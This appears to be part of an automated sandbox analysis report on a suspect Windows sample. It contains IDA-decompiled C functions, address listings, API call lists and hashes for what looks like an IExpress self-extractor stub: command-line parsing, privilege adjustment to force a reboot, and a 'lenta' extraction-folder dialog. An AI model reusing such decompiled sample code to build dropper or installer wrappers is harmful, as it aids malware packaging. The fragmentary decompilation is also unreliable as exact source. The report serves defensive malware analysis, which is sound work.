                                                                      0x00000000
                                                                      0x00f85d62
                                                                      0x00f85d5b
                                                                      0x00f85d4f
                                                                      0x00f85d1d
                                                                      0x00000000
                                                                      0x00f85d9f
                                                                      0x00f85d9f
                                                                      0x00f85da5
                                                                      0x00f85dab
                                                                      0x00f85dba
                                                                      0x00f86218
                                                                      0x00f8621d
                                                                      0x00f86220
                                                                      0x00f86221
                                                                      0x00f86229
                                                                      0x00f86230
                                                                      0x00f86247
                                                                      0x00f8626a
                                                                      0x00f86272
                                                                      0x00f86249
                                                                      0x00f86255
                                                                      0x00f8625f
                                                                      0x00f86264
                                                                      0x00f86264
                                                                      0x00f86284
                                                                      0x00f85dc0
                                                                      0x00f85dc0
                                                                      0x00f85dca
                                                                      0x00f85e22
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85dcc
                                                                      0x00f85dce
                                                                      0x00f85e24
                                                                      0x00f85e24
                                                                      0x00f85e2c
                                                                      0x00f85e47
                                                                      0x00f85e4a
                                                                      0x00f861d2
                                                                      0x00f861e2
                                                                      0x00f861e7
                                                                      0x00f861ee
                                                                      0x00f861f1
                                                                      0x00f861f1
                                                                      0x00f861f8
                                                                      0x00f861f8
                                                                      0x00f85e50
                                                                      0x00f85e53
                                                                      0x00f86109
                                                                      0x00f8611f
                                                                      0x00000000
                                                                      0x00f86125
                                                                      0x00f86137
                                                                      0x00f8613a
                                                                      0x00f8613c
                                                                      0x00f8613e
                                                                      0x00f8613e
                                                                      0x00f86141
                                                                      0x00f86141
                                                                      0x00f86143
                                                                      0x00f86144
                                                                      0x00f8614a
                                                                      0x00000000
                                                                      0x00f86150
                                                                      0x00f86152
                                                                      0x00f8615c
                                                                      0x00f86170
                                                                      0x00f86172
                                                                      0x00f8617c
                                                                      0x00f86190
                                                                      0x00f86190
                                                                      0x00f86196
                                                                      0x00f861a5
                                                                      0x00000000
                                                                      0x00f861ab
                                                                      0x00f861b9
                                                                      0x00f861c6
                                                                      0x00f861c6
                                                                      0x00f8617e
                                                                      0x00f86180
                                                                      0x00f8618a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8618a
                                                                      0x00f8615e
                                                                      0x00f86160
                                                                      0x00f8616a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8616a
                                                                      0x00f8615c
                                                                      0x00f8614a
                                                                      0x00f8610b
                                                                      0x00f8610e
                                                                      0x00f8610e
                                                                      0x00000000
                                                                      0x00f85e59
                                                                      0x00f85e59
                                                                      0x00f85e5c
                                                                      0x00f8604f
                                                                      0x00f86056
                                                                      0x00000000
                                                                      0x00f8605c
                                                                      0x00f8606e
                                                                      0x00f86071
                                                                      0x00f86073
                                                                      0x00f86075
                                                                      0x00f86075
                                                                      0x00f86078
                                                                      0x00f86078
                                                                      0x00f8607a
                                                                      0x00f8607b
                                                                      0x00f86081
                                                                      0x00000000
                                                                      0x00f86087
                                                                      0x00f86087
                                                                      0x00f8608d
                                                                      0x00f8609c
                                                                      0x00000000
                                                                      0x00f860a2
                                                                      0x00f860aa
                                                                      0x00f860b2
                                                                      0x00f860b7
                                                                      0x00f860bd
                                                                      0x00f860bf
                                                                      0x00f860bf
                                                                      0x00f860d6
                                                                      0x00f860e0
                                                                      0x00f860e7
                                                                      0x00f860f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f860f5
                                                                      0x00f8609c
                                                                      0x00f86081
                                                                      0x00f85e62
                                                                      0x00f85e62
                                                                      0x00f85e65
                                                                      0x00f85fd3
                                                                      0x00f85fe9
                                                                      0x00000000
                                                                      0x00f85fef
                                                                      0x00f85fef
                                                                      0x00f85ff7
                                                                      0x00f85ffd
                                                                      0x00f86003
                                                                      0x00f86006
                                                                      0x00f86011
                                                                      0x00f86014
                                                                      0x00f8603d
                                                                      0x00f86016
                                                                      0x00f86018
                                                                      0x00f86019
                                                                      0x00f8601b
                                                                      0x00f86033
                                                                      0x00f8601d
                                                                      0x00f86020
                                                                      0x00f86029
                                                                      0x00f86022
                                                                      0x00f86022
                                                                      0x00f86022
                                                                      0x00f86020
                                                                      0x00f8601b
                                                                      0x00f86042
                                                                      0x00f86044
                                                                      0x00f86046
                                                                      0x00f8604a
                                                                      0x00f85ff7
                                                                      0x00f85fd5
                                                                      0x00f85fd8
                                                                      0x00f85fd8
                                                                      0x00000000
                                                                      0x00f85e6b
                                                                      0x00f85e6b
                                                                      0x00f85e6e
                                                                      0x00f85f8b
                                                                      0x00f85f99
                                                                      0x00000000
                                                                      0x00f85f9f
                                                                      0x00f85fa7
                                                                      0x00f85faf
                                                                      0x00000000
                                                                      0x00f85fb1
                                                                      0x00f85fb3
                                                                      0x00000000
                                                                      0x00f85fb5
                                                                      0x00f85fb7
                                                                      0x00000000
                                                                      0x00f85fb9
                                                                      0x00000000
                                                                      0x00f85fb9
                                                                      0x00f85fb7
                                                                      0x00f85fb3
                                                                      0x00f85faf
                                                                      0x00f85f8d
                                                                      0x00f85f8d
                                                                      0x00f85f8d
                                                                      0x00f85f8f
                                                                      0x00f85fc1
                                                                      0x00f85fc1
                                                                      0x00f85fc1
                                                                      0x00000000
                                                                      0x00f85e74
                                                                      0x00f85e74
                                                                      0x00f85e77
                                                                      0x00f85ea0
                                                                      0x00f85ebd
                                                                      0x00f85f79
                                                                      0x00000000
                                                                      0x00f85f7f
                                                                      0x00f85ec3
                                                                      0x00f85ec3
                                                                      0x00f85ecc
                                                                      0x00f85ed4
                                                                      0x00f85ed6
                                                                      0x00f85edc
                                                                      0x00f85edf
                                                                      0x00f85eea
                                                                      0x00f85eed
                                                                      0x00f85f3f
                                                                      0x00f85f40
                                                                      0x00000000
                                                                      0x00f85eef
                                                                      0x00f85eef
                                                                      0x00f85ef2
                                                                      0x00f85f34
                                                                      0x00f85ef4
                                                                      0x00f85ef4
                                                                      0x00f85ef7
                                                                      0x00f85f2b
                                                                      0x00000000
                                                                      0x00f85ef9
                                                                      0x00f85ef9
                                                                      0x00f85efc
                                                                      0x00f85f22
                                                                      0x00000000
                                                                      0x00f85efe
                                                                      0x00f85eff
                                                                      0x00f85f02
                                                                      0x00f85f16
                                                                      0x00f85f04
                                                                      0x00f85f07
                                                                      0x00f85f0d
                                                                      0x00f85f46
                                                                      0x00f85f46
                                                                      0x00f85f09
                                                                      0x00f85f09
                                                                      0x00f85f09
                                                                      0x00f85f07
                                                                      0x00f85f02
                                                                      0x00f85efc
                                                                      0x00f85ef7
                                                                      0x00f85ef2
                                                                      0x00f85f4c
                                                                      0x00f85f4e
                                                                      0x00f85f50
                                                                      0x00f85f54
                                                                      0x00f85ed4
                                                                      0x00f85ea2
                                                                      0x00f85ea4
                                                                      0x00f85eaf
                                                                      0x00f85eaf
                                                                      0x00000000
                                                                      0x00f85e79
                                                                      0x00f85e7d
                                                                      0x00000000
                                                                      0x00f85e83
                                                                      0x00f85e83
                                                                      0x00f85e83
                                                                      0x00f85e85
                                                                      0x00f85e85
                                                                      0x00f85e8e
                                                                      0x00000000
                                                                      0x00f85e94
                                                                      0x00000000
                                                                      0x00f85e94
                                                                      0x00f85e8e
                                                                      0x00f85e7d
                                                                      0x00f85e77
                                                                      0x00f85e6e
                                                                      0x00f85e65
                                                                      0x00f85e5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85dd0
                                                                      0x00f85dd0
                                                                      0x00f85dd0
                                                                      0x00000000
                                                                      0x00f85dd0
                                                                      0x00f85dce
                                                                      0x00f85dca
                                                                      0x00f85dba
                                                                      0x00000000
                                                                      0x00f85d00
                                                                      0x00f85dd9
                                                                      0x00f85e04
                                                                      0x00f861fe
                                                                      0x00f85e0a
                                                                      0x00f85e0c
                                                                      0x00f85e17
                                                                      0x00f85e17
                                                                      0x00f85e04
                                                                      0x00f86200
                                                                      0x00f86200
                                                                      0x00000000

                                                                      APIs
                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 00F85CEE
                                                                      • GetModuleFileNameA.KERNEL32(00F88B3E,00000104,00000000,?,?), ref: 00F85DFC
                                                                      • CharUpperA.USER32(?), ref: 00F85E3E
                                                                      • CharUpperA.USER32(-00000052), ref: 00F85EE1
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F85F6F
                                                                      • CharUpperA.USER32(?), ref: 00F85FA7
                                                                      • CharUpperA.USER32(-0000004E), ref: 00F86008
                                                                      • CharUpperA.USER32(?), ref: 00F860AA
                                                                      • CloseHandle.KERNEL32(00000000,00F81140,00000000,00000040,00000000), ref: 00F861F1
                                                                      • ExitProcess.KERNEL32 ref: 00F861F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                      • String ID: "$"$:$RegServer
                                                                      • API String ID: 1203814774-25366791
                                                                      • Opcode ID: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                      • Instruction ID: 4be49d7b08efaafca0050c4b00601d8dd3bff84834d3d27bd47d0278601c40ec
                                                                      • Opcode Fuzzy Hash: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                      • Instruction Fuzzy Hash: ABD17D72E08A585FDF35BB388C4C3F53BA1AB16B64F5401EAC486DA191D7748E86BF01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E00F81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                      				void* _v28;
                                                                      				void* __ebx;
                                                                      				signed int _t13;
                                                                      				int _t21;
                                                                      				void* _t25;
                                                                      				int _t28;
                                                                      				signed char _t30;
                                                                      				void* _t38;
                                                                      				void* _t40;
                                                                      				void* _t41;
                                                                      				signed int _t46;
                                                                      
                                                                      				_t41 = __esi;
                                                                      				_t38 = __edi;
                                                                      				_t30 = __ecx;
                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                      					L12:
                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                      						L14:
                                                                      						if( *0xf89a40 != 0) {
                                                                      							_pop(_t30);
                                                                      							_t44 = _t46;
                                                                      							_t13 =  *0xf88004; // 0x644c7055
                                                                      							_v8 = _t13 ^ _t46;
                                                                      							_push(_t38);
                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                      								_v24.PrivilegeCount = 1;
                                                                      								_v12 = 2;
                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                      								CloseHandle(_v28);
                                                                      								_t41 = _t41;
                                                                      								_push(0);
                                                                      								if(_t21 != 0) {
                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                      										_t25 = 1;
                                                                      									} else {
                                                                      										_t37 = 0x4f7;
                                                                      										goto L3;
                                                                      									}
                                                                      								} else {
                                                                      									_t37 = 0x4f6;
                                                                      									goto L4;
                                                                      								}
                                                                      							} else {
                                                                      								_t37 = 0x4f5;
                                                                      								L3:
                                                                      								_push(0);
                                                                      								L4:
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								E00F844B9(0, _t37);
                                                                      								_t25 = 0;
                                                                      							}
                                                                      							_pop(_t40);
                                                                      							return E00F86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                      						} else {
                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                      							goto L16;
                                                                      						}
                                                                      					} else {
                                                                      						_t37 = 0x522;
                                                                      						_t28 = E00F844B9(0, 0x522, 0xf81140, 0, 0x40, 4);
                                                                      						if(_t28 != 6) {
                                                                      							goto L16;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					__eax = E00F81EA7(__ecx);
                                                                      					if(__eax != 2) {
                                                                      						L16:
                                                                      						return _t28;
                                                                      					} else {
                                                                      						goto L12;
                                                                      					}
                                                                      				}
                                                                      			}

















                                                                      0x00f81f90
                                                                      0x00f81f90
                                                                      0x00f81f93
                                                                      0x00f81f98
                                                                      0x00f81fa4
                                                                      0x00f81fa7
                                                                      0x00f81fc5
                                                                      0x00f81fcd
                                                                      0x00f81fdb
                                                                      0x00f81ee5
                                                                      0x00f81eea
                                                                      0x00f81ef1
                                                                      0x00f81ef4
                                                                      0x00f81f0c
                                                                      0x00f81f2e
                                                                      0x00f81f3a
                                                                      0x00f81f46
                                                                      0x00f81f4d
                                                                      0x00f81f58
                                                                      0x00f81f60
                                                                      0x00f81f61
                                                                      0x00f81f62
                                                                      0x00f81f75
                                                                      0x00f81f80
                                                                      0x00f81f77
                                                                      0x00f81f77
                                                                      0x00000000
                                                                      0x00f81f77
                                                                      0x00f81f64
                                                                      0x00f81f64
                                                                      0x00000000
                                                                      0x00f81f64
                                                                      0x00f81f0e
                                                                      0x00f81f0e
                                                                      0x00f81f13
                                                                      0x00f81f13
                                                                      0x00f81f14
                                                                      0x00f81f14
                                                                      0x00f81f16
                                                                      0x00f81f17
                                                                      0x00f81f1a
                                                                      0x00f81f1f
                                                                      0x00f81f1f
                                                                      0x00f81f86
                                                                      0x00f81f8f
                                                                      0x00f81fcf
                                                                      0x00f81fd3
                                                                      0x00000000
                                                                      0x00f81fd3
                                                                      0x00f81fa9
                                                                      0x00f81fb4
                                                                      0x00f81fbb
                                                                      0x00f81fc3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f81fc3
                                                                      0x00f81f9a
                                                                      0x00f81f9a
                                                                      0x00f81fa2
                                                                      0x00f81fd9
                                                                      0x00f81fda
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f81fa2

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00F81EFB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F81F02
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00F81FD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2795981589-3733053543
                                                                      • Opcode ID: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                      • Instruction ID: 863b8c94d020b1e36eb1bf2d852f6b3e2791c4a04108dd37feb749b97ee84a52
                                                                      • Opcode Fuzzy Hash: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                      • Instruction Fuzzy Hash: 7A218871F402096AEB207BA19C4EFFB76BCFB85B61F100219FB06D6181D7798842B761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F86CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                      
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				UnhandledExceptionFilter(_a4);
                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                      			}



                                                                      0x00f86cf7
                                                                      0x00f86d00
                                                                      0x00f86d19

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86CF7
                                                                      • UnhandledExceptionFilter.KERNEL32(00F86E26,?,00F86E26,00F81000), ref: 00F86D00
                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00F86E26,00F81000), ref: 00F86D0B
                                                                      • TerminateProcess.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86D12
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                      • String ID:
                                                                      • API String ID: 3231755760-0
                                                                      • Opcode ID: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                      • Instruction ID: bb9024d3069dc1ac8d5d4addee58cdd0ef5b690df018dd5a5755c719aaf9839b
                                                                      • Opcode Fuzzy Hash: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                      • Instruction Fuzzy Hash: 96D0C93200090CBBFB002BE1EC0CAA93F28EB48616F484002F31982021CA364451AF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E00F83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* __edi;
                                                                      				void* _t6;
                                                                      				void* _t10;
                                                                      				int _t20;
                                                                      				int _t21;
                                                                      				int _t23;
                                                                      				char _t24;
                                                                      				long _t25;
                                                                      				int _t27;
                                                                      				int _t30;
                                                                      				void* _t32;
                                                                      				int _t33;
                                                                      				int _t34;
                                                                      				int _t37;
                                                                      				int _t38;
                                                                      				int _t39;
                                                                      				void* _t42;
                                                                      				void* _t46;
                                                                      				CHAR* _t49;
                                                                      				void* _t58;
                                                                      				void* _t63;
                                                                      				struct HWND__* _t64;
                                                                      
                                                                      				_t64 = _a4;
                                                                      				_t6 = _a8 - 0x10;
                                                                      				if(_t6 == 0) {
                                                                      					_push(0);
                                                                      					L38:
                                                                      					EndDialog(_t64, ??);
                                                                      					L39:
                                                                      					__eflags = 1;
                                                                      					return 1;
                                                                      				}
                                                                      				_t42 = 1;
                                                                      				_t10 = _t6 - 0x100;
                                                                      				if(_t10 == 0) {
                                                                      					E00F843D0(_t64, GetDesktopWindow());
                                                                      					SetWindowTextA(_t64, "lenta");
                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                      					__eflags =  *0xf89a40 - _t42; // 0x3
                                                                      					if(__eflags == 0) {
                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                      					}
                                                                      					L36:
                                                                      					return _t42;
                                                                      				}
                                                                      				if(_t10 == _t42) {
                                                                      					_t20 = _a12 - 1;
                                                                      					__eflags = _t20;
                                                                      					if(_t20 == 0) {
                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xf891e4, 0x104);
                                                                      						__eflags = _t21;
                                                                      						if(_t21 == 0) {
                                                                      							L32:
                                                                      							_t58 = 0x4bf;
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							L25:
                                                                      							E00F844B9(_t64, _t58);
                                                                      							goto L39;
                                                                      						}
                                                                      						_t49 = 0xf891e4;
                                                                      						do {
                                                                      							_t23 =  *_t49;
                                                                      							_t49 =  &(_t49[1]);
                                                                      							__eflags = _t23;
                                                                      						} while (_t23 != 0);
                                                                      						__eflags = _t49 - 0xf891e5 - 3;
                                                                      						if(_t49 - 0xf891e5 < 3) {
                                                                      							goto L32;
                                                                      						}
                                                                      						_t24 =  *0xf891e5; // 0x3a
                                                                      						__eflags = _t24 - 0x3a;
                                                                      						if(_t24 == 0x3a) {
                                                                      							L21:
                                                                      							_t25 = GetFileAttributesA(0xf891e4);
                                                                      							__eflags = _t25 - 0xffffffff;
                                                                      							if(_t25 != 0xffffffff) {
                                                                      								L26:
                                                                      								E00F8658A(0xf891e4, 0x104, 0xf81140);
                                                                      								_t27 = E00F858C8(0xf891e4);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 != 0) {
                                                                      									__eflags =  *0xf891e4 - 0x5c;
                                                                      									if( *0xf891e4 != 0x5c) {
                                                                      										L30:
                                                                      										_t30 = E00F8597D(0xf891e4, 1, _t64, 1);
                                                                      										__eflags = _t30;
                                                                      										if(_t30 == 0) {
                                                                      											L35:
                                                                      											_t42 = 1;
                                                                      											__eflags = 1;
                                                                      											goto L36;
                                                                      										}
                                                                      										L31:
                                                                      										_t42 = 1;
                                                                      										EndDialog(_t64, 1);
                                                                      										goto L36;
                                                                      									}
                                                                      									__eflags =  *0xf891e5 - 0x5c;
                                                                      									if( *0xf891e5 == 0x5c) {
                                                                      										goto L31;
                                                                      									}
                                                                      									goto L30;
                                                                      								}
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_t58 = 0x4be;
                                                                      								goto L25;
                                                                      							}
                                                                      							_t32 = E00F844B9(_t64, 0x54a, 0xf891e4, 0, 0x20, 4);
                                                                      							__eflags = _t32 - 6;
                                                                      							if(_t32 != 6) {
                                                                      								goto L35;
                                                                      							}
                                                                      							_t33 = CreateDirectoryA(0xf891e4, 0);
                                                                      							__eflags = _t33;
                                                                      							if(_t33 != 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0xf891e4);
                                                                      							_t58 = 0x4cb;
                                                                      							goto L25;
                                                                      						}
                                                                      						__eflags =  *0xf891e4 - 0x5c;
                                                                      						if( *0xf891e4 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						__eflags = _t24 - 0x5c;
                                                                      						if(_t24 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						goto L21;
                                                                      					}
                                                                      					_t34 = _t20 - 1;
                                                                      					__eflags = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						EndDialog(_t64, 0);
                                                                      						 *0xf89124 = 0x800704c7;
                                                                      						goto L39;
                                                                      					}
                                                                      					__eflags = _t34 != 0x834;
                                                                      					if(_t34 != 0x834) {
                                                                      						goto L36;
                                                                      					}
                                                                      					_t37 = LoadStringA( *0xf89a3c, 0x3e8, 0xf88598, 0x200);
                                                                      					__eflags = _t37;
                                                                      					if(_t37 != 0) {
                                                                      						_t38 = E00F84224(_t64, _t46, _t46);
                                                                      						__eflags = _t38;
                                                                      						if(_t38 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xf887a0);
                                                                      						__eflags = _t39;
                                                                      						if(_t39 != 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t63 = 0x4c0;
                                                                      						L9:
                                                                      						E00F844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						goto L38;
                                                                      					}
                                                                      					_t63 = 0x4b1;
                                                                      					goto L9;
                                                                      				}
                                                                      				return 0;
                                                                      			}

























                                                                      0x00f8321b
                                                                      0x00f8321e
                                                                      0x00f83221
                                                                      0x00f8343c
                                                                      0x00f8343e
                                                                      0x00f8343f
                                                                      0x00f83445
                                                                      0x00f83447
                                                                      0x00000000
                                                                      0x00f83447
                                                                      0x00f83229
                                                                      0x00f8322a
                                                                      0x00f8322f
                                                                      0x00f833ec
                                                                      0x00f833f7
                                                                      0x00f83410
                                                                      0x00f83416
                                                                      0x00f8341d
                                                                      0x00f8342d
                                                                      0x00f8342d
                                                                      0x00f83438
                                                                      0x00000000
                                                                      0x00f83438
                                                                      0x00f83237
                                                                      0x00f83243
                                                                      0x00f83243
                                                                      0x00f83246
                                                                      0x00f832ee
                                                                      0x00f832f4
                                                                      0x00f832f6
                                                                      0x00f833d4
                                                                      0x00f833d6
                                                                      0x00f833db
                                                                      0x00f833dc
                                                                      0x00f833de
                                                                      0x00f833df
                                                                      0x00f83370
                                                                      0x00f83372
                                                                      0x00000000
                                                                      0x00f83372
                                                                      0x00f832fc
                                                                      0x00f83301
                                                                      0x00f83301
                                                                      0x00f83303
                                                                      0x00f83304
                                                                      0x00f83304
                                                                      0x00f8330a
                                                                      0x00f8330d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83313
                                                                      0x00f83318
                                                                      0x00f8331a
                                                                      0x00f83331
                                                                      0x00f83332
                                                                      0x00f8333a
                                                                      0x00f8333d
                                                                      0x00f8337c
                                                                      0x00f83388
                                                                      0x00f8338f
                                                                      0x00f83394
                                                                      0x00f83396
                                                                      0x00f833a4
                                                                      0x00f833ab
                                                                      0x00f833b6
                                                                      0x00f833be
                                                                      0x00f833c3
                                                                      0x00f833c5
                                                                      0x00f83435
                                                                      0x00f83437
                                                                      0x00f83437
                                                                      0x00000000
                                                                      0x00f83437
                                                                      0x00f833c7
                                                                      0x00f833c9
                                                                      0x00f833cc
                                                                      0x00000000
                                                                      0x00f833cc
                                                                      0x00f833ad
                                                                      0x00f833b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f833b4
                                                                      0x00f83398
                                                                      0x00f83399
                                                                      0x00f8339b
                                                                      0x00f8339c
                                                                      0x00f8339d
                                                                      0x00000000
                                                                      0x00f8339d
                                                                      0x00f8334c
                                                                      0x00f83351
                                                                      0x00f83354
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8335c
                                                                      0x00f83362
                                                                      0x00f83364
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83366
                                                                      0x00f83367
                                                                      0x00f83369
                                                                      0x00f8336a
                                                                      0x00f8336b
                                                                      0x00000000
                                                                      0x00f8336b
                                                                      0x00f8331c
                                                                      0x00f83323
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83329
                                                                      0x00f8332b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8332b
                                                                      0x00f8324c
                                                                      0x00f8324c
                                                                      0x00f8324f
                                                                      0x00f832c8
                                                                      0x00f832ce
                                                                      0x00000000
                                                                      0x00f832ce
                                                                      0x00f83251
                                                                      0x00f83256
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83271
                                                                      0x00f83277
                                                                      0x00f83279
                                                                      0x00f83298
                                                                      0x00f8329d
                                                                      0x00f8329f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f832b0
                                                                      0x00f832b6
                                                                      0x00f832b8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f832be
                                                                      0x00f83280
                                                                      0x00f83289
                                                                      0x00f8328e
                                                                      0x00000000
                                                                      0x00f8328e
                                                                      0x00f8327b
                                                                      0x00000000
                                                                      0x00f8327b
                                                                      0x00000000

                                                                      APIs
                                                                      • LoadStringA.USER32(000003E8,00F88598,00000200), ref: 00F83271
                                                                      • GetDesktopWindow.USER32 ref: 00F833E2
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F833F7
                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F83410
                                                                      • GetDlgItem.USER32(?,00000836), ref: 00F83426
                                                                      • EnableWindow.USER32(00000000), ref: 00F8342D
                                                                      • EndDialog.USER32(?,00000000), ref: 00F8343F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
